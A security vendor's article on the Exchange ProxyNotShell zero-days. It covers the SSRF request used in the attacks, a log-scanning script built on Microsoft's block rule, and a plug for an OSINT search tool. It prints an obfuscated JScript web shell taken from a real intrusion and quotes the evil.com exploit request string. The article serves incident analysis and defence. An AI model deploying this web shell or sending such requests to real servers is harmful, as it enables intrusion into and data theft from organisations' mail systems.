On September 30, 2022, Microsoft announced security updates for two zero-day vulnerabilities affecting Microsoft Exchange Server 2013, 2016, and 2019.
This article covers how to use a security OSINT tool to find servers with these vulnerabilities and presents a case study of an exploitable server. The two vulnerabilities are CVE-2022-41082 and CVE-2022-41040. An attacker who has authenticated access to the targeted Exchange Server can use both CVEs to launch a Remote Code Execution (RCE) attack on the server.

How Hackers Exploit Microsoft Exchange Zero-day Vulnerabilities
Hackers use CVE-2022-41040 (CVSSv3 score 8.8) to escalate privileges through a Server-Side Request Forgery (SSRF) attack. They then carry out a remote code execution (RCE) attack using CVE-2022-41082 (CVSSv3 score 8.8). After the Exchange Server is compromised, Active Directory information and data are leaked through malicious apps installed on it.
Hackers often target exposed and vulnerable Exchange servers. They then send an HTTP request ‘autodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com’ through which they can bypass Microsoft-recommended block rules. Once the server becomes accessible, a vulnerable Exchange backend component allows for RCE conditions.

Image Source : Microsoft Security, Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082
GTSC, a Vietnamese cybersecurity company, confirmed that the SSRF attack using CVE-2022-41040 occurred where an obfuscated web shell (a vulnerability that enables a web server to be remotely accessed) was requested on the Exchange server. This hacker used a user agent and accessed Antsword (an open-source, cross-platform management tool based in China). The web shell showed that the hackers used Windows code page 936, a program that used simplified Chinese characters. This leads us to believe that a group of Chinese hackers carried out the attack. Another notable point can be found in the RedirSuiteServiceProxy.aspx file (a regular file available on the Exchange server): the contents of the file were changed to the code found in the web shell file.
#Server Requested Webshell
<%@Page Language="Jscript"%>
<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('NTcyM'+'jk3O3'+'ZhciB'+'zYWZl'+''+'P'+'S'+char(837-763)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MQ=='))+char(51450/525)+''+''+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Wg=='))+'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+'WFtRG'+'Z6bU8'+'xajhk'+'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+'')));%>
Detect Exploitable Microsoft Exchange Servers Using OSINT Tools
Users can search for Exchange servers with the Exchange zero-day vulnerabilities using Criminal IP (https://www.criminalip.io). Use the cve_id filter to search for CVE-2022-41082. Searching for this vulnerability yields 91,807 IP addresses hosting vulnerable Exchange servers.
[Criminal IP Search 101 – Is your MS Exchange Server Safe?]


Port statistics show that most IP addresses with Microsoft Exchange zero-day vulnerabilities have both ports 80 and 443 exposed. Other open ports are often variations of %443, such as 8443, 4433, etc.

Furthermore, we can see that some IP addresses are still operating in a vulnerable state with weak certificates.

Most IP addresses found with Criminal IP show vulnerable ports 80 and 443. The Inbound Score is also rated critical, which tags these IP addresses as malicious. The IP address intelligence report for the server in this case study states that a total of 89 vulnerabilities are exposed, including issues other than CVE-2022-41082 and CVE-2022-41040. Furthermore, this IP address is a Hosting IP, which means that if a hacker escalates their privileges through CVE-2022-41040, they can penetrate the internal network and leak further data from the server.


How Companies and Organizations Address Microsoft Exchange Zero-day Vulnerabilities
Microsoft recommends that users add the block rule .*autodiscover\.json.*Powershell.* under IIS Manager → Default Web Site → URL Rewrite → Actions in order to block known hacker attack patterns, and also recommends disabling remote PowerShell access.
However, as with all zero-day vulnerabilities, it is very difficult to determine how these new vulnerabilities can affect the server. Usually, security personnel in corporations use vulnerability scanners to determine which vulnerabilities to take action on when these zero-day issues occur. However, it is difficult to scan all servers in operation, and it is also difficult to take quick action when an attack takes place.
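The block pattern quoted above can also be applied to existing IIS logs to check whether matching requests have already been sent to a server. The following Python is an added example, not code from the original article or from Microsoft; the log excerpt, host names and addresses are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Block pattern from the mitigation above; IIS URL Rewrite ignores case by default.
BLOCK_RULE = re.compile(r".*autodiscover\.json.*Powershell.*", re.IGNORECASE)

# Constructed IIS W3C log excerpt: documentation addresses, made-up requests.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2022-10-01 08:14:02 GET /owa/auth/logon.aspx url=https://mail.example.test/owa 443 198.51.100.7 200
2022-10-01 08:15:40 POST /autodiscover/autodiscover.json @example.test/powershell/&Email=autodiscover/autodiscover.json%3f@example.test 443 203.0.113.9 200
2022-10-01 08:15:55 GET /autodiscover/autodiscover.json @example.test/PowerShell/&Email=autodiscover/autodiscover.json%3f@example.test 443 203.0.113.9 403
2022-10-01 08:16:10 GET /autodiscover/autodiscover.json/v1.0/user@example.test Protocol=ActiveSync 443 192.0.2.44 200
2022-10-01 08:16:12 POST /Autodiscover/Autodiscover.xml - 443 192.0.2.44 200
"""

def parse_w3c(text):
    """Yield one dict per request, taking column names from the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))

def find_hits(text):
    """Return the requests whose percent-decoded URI matches the block pattern."""
    hits = []
    for row in parse_w3c(text):
        query = row.get("cs-uri-query", "-")
        uri = row.get("cs-uri-stem", "") + ("" if query == "-" else "?" + query)
        if BLOCK_RULE.match(unquote(uri)):
            hits.append({"time": row["date"] + " " + row["time"],
                         "client": row["c-ip"], "status": row["sc-status"], "uri": uri})
    return hits

def statuses_by_client(text):
    """Group the response codes of matching requests by client address."""
    summary = {}
    for hit in find_hits(text):
        summary.setdefault(hit["client"], []).append(hit["status"])
    return summary

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["status"], hit["uri"])
```

Ordinary Autodiscover requests in the sample are not flagged, because the pattern requires both autodiscover.json and Powershell in the same URI.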
Using a security OSINT tool, you can quickly find vulnerable assets with Microsoft Exchange zero-day vulnerabilities. In addition, it is possible to effectively manage the attack surface by scanning for vulnerabilities, including neglected assets that are not identified internally and ports opened by mistake. Therefore, to quickly check whether there is a Microsoft Exchange zero-day vulnerability threat, search the IP address using Criminal IP, a security OSINT tool, and check whether CVEs are mapped.
Check out this analysis article about the Zero-day vulnerability exploits found in June 2022 on Atlassian’s Confluence server.
Source : Criminal IP (https://www.criminalip.io)